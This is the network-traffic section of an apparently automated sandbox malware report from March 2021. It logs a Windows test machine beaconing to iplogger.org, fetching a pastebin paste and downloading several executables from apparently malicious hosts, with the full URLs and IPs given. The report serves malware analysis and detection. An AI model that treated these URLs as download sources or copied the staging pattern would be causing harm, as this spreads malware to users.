Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 103.124.106.203 | Active | Moloch |
| 104.23.98.190 | Active | Moloch |
| 108.167.143.77 | Active | Moloch |
| 141.136.39.190 | Active | Moloch |
| 164.124.101.2 | Active | Moloch |
| 172.217.25.14 | Active | Moloch |
| 172.67.162.110 | Active | Moloch |
| 179.43.158.179 | Active | Moloch |
| 188.93.233.223 | Active | Moloch |
| 45.144.30.78 | Active | Moloch |
| 5.101.110.225 | Active | Moloch |
| 88.99.66.31 | Active | Moloch |
| 91.200.41.57 | Active | Moloch |
- TCP Requests
-
-
192.168.56.102:49812 103.124.106.203:80
-
192.168.56.102:49809 104.23.98.190:443pastebin.com
-
192.168.56.102:49819 108.167.143.77:443www.investinae.com
-
192.168.56.102:49818 141.136.39.190:443msiamericas.com
-
192.168.56.102:49797 172.217.25.14:443
-
192.168.56.102:49815 172.67.162.110:80file.ekkggr3.com
-
192.168.56.102:49820 179.43.158.179:80mytoolsprivacy.site
-
192.168.56.102:49813 188.93.233.223:80
-
192.168.56.102:49817 45.144.30.78:80aretywer.xyz
-
192.168.56.102:49814 5.101.110.225:443digitalassets.ams3.digitaloceanspaces.com
-
192.168.56.102:49816 5.101.110.225:443digitalassets.ams3.digitaloceanspaces.com
-
192.168.56.102:49808 88.99.66.31:443iplogger.org
-
192.168.56.102:49835 88.99.66.31:443iplogger.org
-
192.168.56.102:49810 91.200.41.57:80whatitis.site
-
- UDP Requests
-
-
192.168.56.102:50538 164.124.101.2:53
-
192.168.56.102:50839 164.124.101.2:53
-
192.168.56.102:51857 164.124.101.2:53
-
192.168.56.102:54221 164.124.101.2:53
-
192.168.56.102:54660 164.124.101.2:53
-
192.168.56.102:55957 164.124.101.2:53
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:61998 164.124.101.2:53
-
192.168.56.102:62039 164.124.101.2:53
-
192.168.56.102:62461 164.124.101.2:53
-
192.168.56.102:63574 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:50840 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
8.8.8.8:53 192.168.56.102:57660
-
GET
200
https://iplogger.org/1ixtu7
REQUEST
RESPONSE
BODY
GET /1ixtu7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 09:51:49 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=jmr2bprpm6iv1es0bgcdcbvjc0; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=262641482; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://pastebin.com/raw/mH2EJxkv
REQUEST
RESPONSE
BODY
GET /raw/mH2EJxkv HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 09:51:50 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d730ea203edace3d80f316309769922a81616406710; expires=Wed, 21-Apr-21 09:51:50 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 1624
cf-request-id: 08faf21f4000000284120bb000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 633e86120eef0284-ICN
GET
200
https://iplogger.org/1hVa87
REQUEST
RESPONSE
BODY
GET /1hVa87 HTTP/1.1
Accept: text/*
User-Agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows Phone OS 4.0; Trident/4.0; IEMobile/4.0; HTC; Titan)
Host: iplogger.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 09:52:24 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=f1bshb6phpmf9e2r3fq94pbr36; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=262641447; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 4f8c28e20130e4f741269a57e8c90ce50dc0c7ccf29e4467d4563aa01d48960f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://iplogger.org/1lp5k
REQUEST
RESPONSE
BODY
GET /1lp5k HTTP/1.1
Host: iplogger.org
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 09:52:30 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=tlebnr6feu813bfs7f2sq7as92; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=262641441; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
http://whatitis.site/dlc/mixinte
REQUEST
RESPONSE
BODY
GET /dlc/mixinte HTTP/1.1
Host: whatitis.site
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 09:51:45 GMT
Content-Length: 317952
Connection: keep-alive
Last-Modified: Mon, 22 Mar 2021 09:51:10 GMT
ETag: "4da00-5be1d016e1eb0"
Accept-Ranges: bytes
GET
200
http://103.124.106.203/cof4/inst.exe
REQUEST
RESPONSE
BODY
GET /cof4/inst.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: 103.124.106.203
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 22 Mar 2021 09:51:51 GMT
Content-Type: application/octet-stream
Content-Length: 5803008
Last-Modified: Sun, 21 Mar 2021 07:20:24 GMT
Connection: keep-alive
ETag: "6056f3b8-588c00"
Accept-Ranges: bytes
GET
200
http://188.93.233.223/proxy1.exe
REQUEST
RESPONSE
BODY
GET /proxy1.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: 188.93.233.223
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 09:51:52 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 22 Mar 2021 09:50:01 GMT
ETag: "83000-5be1cfd4ac9e0"
Accept-Ranges: bytes
Content-Length: 536576
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET
200
http://file.ekkggr3.com/iuww/jvppp.exe
REQUEST
RESPONSE
BODY
GET /iuww/jvppp.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: file.ekkggr3.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 09:51:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d73f7dc2a6a21bf057f2ab900092bf5b11616406711; expires=Wed, 21-Apr-21 09:51:51 GMT; path=/; domain=.ekkggr3.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 08faf22543000054e759104000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jNl0pQ59mROk8BtbTnaguJ1zwF7Widu7RWNxCYVnNkhVJ7Tp85Ibxi1SKJjROpziaQcwbtnv7wfI8vvjTjxdNARkB7pRgdfOqRuI3nhYT5pq"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 633e861b9eb754e7-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
http://aretywer.xyz/Corepad092.exe
REQUEST
RESPONSE
BODY
GET /Corepad092.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: aretywer.xyz
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 09:51:52 GMT
Content-Type: application/octet-stream
Content-Length: 603648
Last-Modified: Mon, 22 Mar 2021 09:50:01 GMT
Connection: keep-alive
ETag: "60586849-93600"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes
GET
200
http://mytoolsprivacy.site/downloads/privacytools3.exe
REQUEST
RESPONSE
BODY
GET /downloads/privacytools3.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: mytoolsprivacy.site
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 09:51:52 GMT
Content-Type: application/x-msdos-program
Content-Length: 260608
Connection: keep-alive
Keep-Alive: timeout=3
Last-Modified: Mon, 22 Mar 2021 09:51:01 GMT
ETag: "3fa00-5be1d00e55a13"
Accept-Ranges: bytes
ICMP traffic
| Source | Destination | ICMP Type | Data |
|---|---|---|---|
| 192.168.56.102 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.102:49808 88.99.66.31:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
|
TLSv1 192.168.56.102:49809 104.23.98.190:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | ce:69:3b:0c:23:1f:bf:e1:a4:87:d2:44:26:54:a5:e4:bd:26:2f:7a |
|
TLSv1 192.168.56.102:49835 88.99.66.31:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
Snort Alerts
No Snort Alerts